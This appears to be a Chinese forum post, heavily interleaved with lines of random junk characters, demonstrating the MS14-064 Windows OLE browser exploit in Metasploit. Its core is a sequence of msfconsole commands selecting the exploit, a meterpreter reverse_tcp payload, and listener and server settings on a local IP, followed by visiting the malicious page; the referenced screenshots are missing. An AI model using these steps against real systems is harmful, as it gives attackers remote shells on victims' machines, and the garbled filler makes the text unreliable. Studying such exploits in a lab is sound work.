$ B5 N# c) h; {. j, u$ q8 m6 _
我发现msf下的exp只能针对带有powershell的机器进行攻击,我们用如下方法来搞演示
( J: e' J8 q3 g: k l
/ o! O& B% G8 ?" ^9 g; @
! M0 C5 L" ^& n9 d' J 开启msf执行命令use exploits/windows/browser/ms14_064_ole_code_execution如图:
- |$ m' K1 @, ^/ A( A% `1 k2 E9 K
+ k" s3 L: B8 v( E# B/ R
$ w$ {$ B7 {0 d+ r/ H$ f8 [4 w. N
然后执行命令 set PAYLOAD windows/meterpreter/reverse_tcp
. C# k. x) R0 w7 p: P# T: Z! ?
. j: q( p+ u7 W b7 ?
( h) i v- ~- d5 V set AllowPowershellPrompt true
. _: s! d; I/ i% ^# t$ y8 Q3 M
8 x5 X a" I& m8 d' B8 w" K1 F% m/ ]
7 \+ p( i* ^: j' e6 C Set LHOST 192.168.0.109
0 f1 j) O6 G$ `$ c' N: g3 S
/ `7 k( g) j4 u$ m3 \- O
5 a' p+ L* O, B" z! F; a& \1 a
set SRVHOST 192.168.0.109
+ r) ]; p0 Z. |/ h& M$ u
' c9 P/ D/ h$ j2 n+ v& M4 N# |2 `$ C6 i' k4 z9 P$ C
Set uripath share4 ~4 T2 w; S5 F/ v
! R9 B7 p" X8 n, G: N$ w' }
/ U! Z; y/ N" Z) v' c; a
Set srvport 80
, @) d$ V- ~1 m# W8 n4 @
; U4 T. r' ]) m" j4 r
/ _& \3 `9 P4 B1 B
; @6 L9 V1 A" x+ ?
" R: \8 P+ ~: h& \# Z9 A" D6 \ k3 m6 [
8 n% c1 {0 v! x; y! U / b4 W/ p; o+ H6 {/ f) J% P
7 a4 T$ O3 z$ H6 A G. V. @8 ?
" S) Q9 n2 C# r, B' M5 f# `4 [9 i- h 6 h) ^+ Z0 _9 ?, M1 ^& `
* X- {/ Z6 A. p0 K. ^( P& O
7 c3 A+ M6 c7 F5 V5 z; T
* g3 z6 l( `7 `# m3 I, N
: l: J' h, `, O4 O% f
- a; T. q* s& Z) i ) L3 q# e+ @ p/ [! w8 I$ v% P t
. y3 r' t2 Z. P- r
1 n5 K& {" w `) @$ r/ \# v( y* J 下面我们来访问本地地址如图:' a) e8 z6 G s8 U4 F
/ f- i, V: V7 [7 d1 l" O' L
0 t* _; _* Y M ^' A % z* [" X4 E/ v; M5 C% {0 D- P
9 f! Y" M) |) G2 W
. g& k7 r6 @7 C6 `0 R( o
; n+ }$ w% b, Q' ^5 Z# S# [1 L
: v3 g. P8 L* P0 c
2 x5 O/ B1 N! ]; y
( j3 }, W! K/ z/ Q